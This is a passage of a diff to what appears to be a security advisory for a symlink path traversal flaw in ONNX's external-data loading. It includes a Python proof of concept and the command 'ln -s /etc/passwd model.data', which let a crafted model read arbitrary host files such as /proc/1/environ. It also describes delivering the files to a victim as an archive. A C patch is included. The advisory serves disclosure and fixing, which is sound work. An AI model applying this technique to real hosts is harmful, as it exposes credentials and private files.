+ "details": "### Summary\nA path traversal vulnerability via symlink allows to read arbitrary files outside model or user-provided directory. \n\n### Details\nThe following check for symlink is ineffective and it is possible to point a symlink to an arbitrary location on the file system:\nhttps://github.com/onnx/onnx/blob/336652a4b2ab1e530ae02269efa7038082cef250/onnx/checker.cc#L1024-L1033\n\n`std::filesystem::is_regular_file` performs a `status(p)` call on the provided path, which follows symbolic links to determine the file type, meaning it will return true if the target of a symlink is a regular file. \n\n\n### PoC\n\n\n\n```python\n# Create a demo model with external data\nimport os\nimport numpy as np\nimport onnx\nfrom onnx import helper, TensorProto, numpy_helper\n\ndef create_onnx_model(output_path=\"model.onnx\"):\n weight_matrix = np.random.randn(1000, 1000).astype(np.float32)\n\n X = helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, [1, 1000])\n Y = helper.make_tensor_value_info(\"Y\", TensorProto.FLOAT, [1, 1000])\n W = numpy_helper.from_array(weight_matrix, name=\"W\")\n\n matmul_node = helper.make_node(\"MatMul\", inputs=[\"X\", \"W\"], outputs=[\"Y\"], name=\"matmul\")\n\n graph = helper.make_graph(\n nodes=[matmul_node],\n name=\"SimpleModel\",\n inputs=[X],\n outputs=[Y],\n initializer=[W]\n )\n\n model = helper.make_model(graph, opset_imports=[helper.make_opsetid(\"\", 11)])\n onnx.checker.check_model(model)\n\n data_file = output_path.replace('.onnx', '.data')\n\n if os.path.exists(output_path):\n os.remove(output_path)\n if os.path.exists(data_file):\n os.remove(data_file)\n\n onnx.save_model(\n model,\n output_path,\n save_as_external_data=True,\n all_tensors_to_one_file=True,\n location=os.path.basename(data_file),\n size_threshold=1024 * 1024\n )\n\nif __name__ == \"__main__\":\n create_onnx_model(\"model.onnx\")\n```\n\n1. Run the above code to generate a sample model with external data.\n2. Remove `model.data`\n3. Run `ln -s /etc/passwd model.data`\n4. Load the model using the following code\n5. Observe check for symlink is bypassed and model is succesfuly loaded\n\n```python\nimport onnx\nfrom onnx.external_data_helper import load_external_data_for_model\n\ndef load_onnx_model_basic(model_path=\"model.onnx\"):\n model = onnx.load(model_path)\n return model\n\ndef load_onnx_model_explicit(model_path=\"model.onnx\"):\n model = onnx.load(model_path, load_external_data=False)\n load_external_data_for_model(model, \".\")\n return model\n\nif __name__ == \"__main__\":\n model = load_onnx_model_basic(\"model.onnx\")\n\n```\n\nA common misuse case for successful exploitation is that an adversary can provide victim with a compressed file, containing `poc.onnx` and `poc.data (symlink)`. Once the victim uncompress and load the model, symlink read the adversary selected arbitrary file.\n\n\n### Impact\n\nRead sensitive and arbitrary files and environment variable (e.g. /proc/1/environ) from the host that loads the model.\n\nNOTE: this issue is not limited to UNIX.\n\n### Sample patch\n\n```c\n#include <fcntl.h>\n#include <sys/stat.h>\n#include <unistd.h>\n#include <errno.h>\n\nint open_external_file_no_symlink(const char *base_dir,\n const char *relative_path) {\n int dirfd = -1;\n int fd = -1;\n struct stat st;\n\n // Open base directory\n dirfd = open(base_dir, O_RDONLY | O_DIRECTORY);\n if (dirfd < 0) {\n return -1;\n }\n\n // Open the target relative to base_dir\n // O_NOFOLLOW => fail if final path component is a symlink\n fd = openat(dirfd,\n relative_path,\n O_RDONLY | O_NOFOLLOW);\n close(dirfd);\n\n if (fd < 0) {\n // ELOOP is the typical error if a symlink is encountered\n return -1;\n }\n\n // Inspect the *opened file*\n if (fstat(fd, &st) != 0) {\n close(fd);\n return -1;\n }\n\n // Enforce \"regular file only\"\n if (!S_ISREG(st.st_mode)) {\n close(fd);\n errno = EINVAL;\n return -1;\n }\n\n // fd is now:\n // - not a symlink\n // - not a directory\n // - not a device / FIFO / socket\n // - race-safe\n return fd;\n}\n```\n\n### Resources\n\n* https://cwe.mitre.org/data/definitions/61.html\n* https://discuss.secdim.com/t/input-validation-necessary-but-not-sufficient-it-doesnt-target-the-fundamental-issue/1172\n* https://discuss.secdim.com/t/common-pitfalls-for-patching-path-traversal/3368",
0 commit comments